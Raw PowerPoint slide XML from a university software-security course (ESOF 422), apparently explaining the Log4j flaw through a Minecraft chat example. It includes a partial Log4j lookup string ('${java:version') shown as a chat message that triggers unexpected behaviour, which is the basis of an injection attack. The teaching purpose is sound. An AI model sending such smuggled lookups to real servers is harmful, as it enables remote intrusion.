                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="2914740" y="2469743"/>
                <a:ext cx="189360" cy="18778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0100F356-445A-3705-42E4-6B74D3167E2C}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3067020" y="2551215"/>
              <a:ext cx="6117480" cy="2477160"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="26" name="Ink 25">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0100F356-445A-3705-42E4-6B74D3167E2C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId15"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="3031020" y="2515215"/>
                <a:ext cx="6189120" cy="2548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EED015ED-EFAC-3AC7-DC0E-519DD698A94A}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="504540" y="4638135"/>
              <a:ext cx="3515400" cy="720"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="28" name="Ink 27">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EED015ED-EFAC-3AC7-DC0E-519DD698A94A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId17"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="468540" y="4566135"/>
                <a:ext cx="3587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0751C30A-C76D-3DC2-717D-AAB2527C4E2A}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="490860" y="4657575"/>
              <a:ext cx="23400" cy="345600"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="29" name="Ink 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0751C30A-C76D-3DC2-717D-AAB2527C4E2A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId19"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="454860" y="4621612"/>
                <a:ext cx="95040" cy="417165"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E58512E-65E1-9B7D-11E3-972455EF874F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="4691160"/>
            <a:ext cx="1790700" cy="338040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="282821"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="2828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5C4AE5-7B2A-6C5C-3CAC-B58375CC2CB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5986106" y="4703444"/>
            <a:ext cx="2010487" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>user_chat_message</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83FABDB0-B68B-D158-0332-F727A9239314}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3389148" y="5494879"/>
            <a:ext cx="4616970" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Nothing out of the ordinary yet…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="426833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7BC72C2-D199-AE27-2D44-68765F9E9126}"/>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564BA404-28A3-9E6E-F627-248F2E610958}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-6350" y="6466078"/>
            <a:ext cx="12204700" cy="398780"/>
            <a:chOff x="-6350" y="6466078"/>
            <a:chExt cx="12204700" cy="398780"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="F6D28B"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="object 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23D1CC7D-941D-4115-F36D-6F244E5FDAAD}"/>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rgbClr val="EEB211"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A2ADAED-3BA7-7A10-92FB-CBE027CB72C2}"/>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rgbClr val="EEB211"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Slide Number Placeholder 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C497290C-9E0D-8AD1-220E-58107507D3F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87A6C8C0-75B4-0F42-427F-A300DC4D01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8548" y="6477000"/>
            <a:ext cx="1407652" cy="3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from Minecraft, a popular video game which poses a... |  Download Scientific Diagram">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1896228-5B75-93BB-41C9-A05F0119BC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33400"/>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omputer with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4E3C473-6410-E51D-0496-C3FBE799BA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1752600"/>
            <a:ext cx="1371600" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Graphic 7" descr="Computer with solid fill">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40D4AC45-07E2-7AC9-7F3A-501551D7D4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7800" y="1752600"/>
            <a:ext cx="1371600" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3076" name="Picture 4" descr="Java (programming language) - Wikipedia">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B77AE37-E9C4-F8D4-C2D7-CCFA1835AE6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345E568-4929-4FD8-03CA-F320AE0D7875}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="304800"/>
            <a:ext cx="3657600" cy="3886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217186-1E4C-8BB7-DCD2-4B43FDAD6BBD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7886700" y="341495"/>
            <a:ext cx="3657600" cy="38495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A screenshot from Minecraft, a popular video game which poses a... |  Download Scientific Diagram">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3B46166-65D0-8B39-2D7D-124414DC2F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991" y="604216"/>
            <a:ext cx="2667000" cy="14213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ker - Free people icons">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E74DD49B-C411-141C-47AF-7BEFB4F93A1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77363" y="781493"/>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ava (programming language) - Wikipedia">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E67E635C-5CA4-3AE7-555B-9F53C404547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5600" y="1676400"/>
            <a:ext cx="664916"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A80E5DD9-8FE9-6318-543A-71C0FA941963}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4572000" y="1600200"/>
            <a:ext cx="2819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877820B-042A-544E-B676-6A416B8BFD33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4333876" y="853228"/>
            <a:ext cx="3385863" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Sends message in chat</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A0EC127-3A7D-063D-612A-4DE998D0673F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="-27837"/>
            <a:ext cx="659155" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>JVM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78459050-5437-5D7F-9282-19AB3B73FD3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10841413" y="29539"/>
            <a:ext cx="659155" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>JVM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="Picture 2" descr="Log4j - Wikipedia">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F953D66-6E67-FA39-FC51-F34C02D0EDE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627" y="2964560"/>
            <a:ext cx="2597175" cy="107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77D49C8-12C0-E797-4D41-6AA3BBBC030C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="400050" y="4529111"/>
            <a:ext cx="8743950" cy="590695"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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28C38D05-2EBA-B239-DFB6-934D559D4088}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="2950740" y="2505855"/>
              <a:ext cx="117720" cy="115920"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="25" name="Ink 24">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28C38D05-2EBA-B239-DFB6-934D559D4088}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId11"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="2914740" y="2469743"/>
                <a:ext cx="189360" cy="18778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7A589E0C-F8EC-1BC5-9B5C-5F2F33CD3816}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="3067020" y="2551215"/>
              <a:ext cx="6117480" cy="2477160"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="26" name="Ink 25">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A589E0C-F8EC-1BC5-9B5C-5F2F33CD3816}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId13"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="3031020" y="2515215"/>
                <a:ext cx="6189120" cy="254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5AAE4564-1238-05B1-F38A-360857871907}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="504540" y="4638135"/>
              <a:ext cx="3515400" cy="720"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="28" name="Ink 27">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AAE4564-1238-05B1-F38A-360857871907}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId15"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="468540" y="4566135"/>
                <a:ext cx="3587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00BBDAFD-F1EE-97F0-DE2A-DC799B3616B6}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="490860" y="4657575"/>
              <a:ext cx="23400" cy="345600"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="29" name="Ink 28">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00BBDAFD-F1EE-97F0-DE2A-DC799B3616B6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId17"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="454860" y="4621612"/>
                <a:ext cx="95040" cy="417165"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{192EAA6B-EF41-627F-F3B3-31D05ACB5AF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="4691160"/>
            <a:ext cx="1790700" cy="338040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="282821"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="2828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0609F6C-302C-0BA0-FF14-67A2F4C8A164}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5986106" y="4703444"/>
            <a:ext cx="2010487" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>user_chat_message</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56FBB880-770A-F779-DDC2-89AF7727ECEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="464215" y="5742151"/>
            <a:ext cx="7994496" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However, some special Java syntax can lead to some unexpected behaviors</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63A54794-D4F6-CB66-45DA-64A658A6A49F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4563545" y="1680521"/>
            <a:ext cx="2949846" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>java:version</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D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9507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9197</TotalTime>
  <Words>1930</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>315</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Courier New</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Rockwell Extra Bold</vt:lpstr>
      <vt:lpstr>Source Sans Pro</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>ESOF 422:  Advanced Software Engineering: Cyber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ESOF 422</dc:title>
  <dc:creator>Reese Pearsall</dc:creator>
  <cp:lastModifiedBy>Pearsall, Reese</cp:lastModifiedBy>
  <cp:revision>62</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-08-21T16:55:59Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-26T19:54:24Z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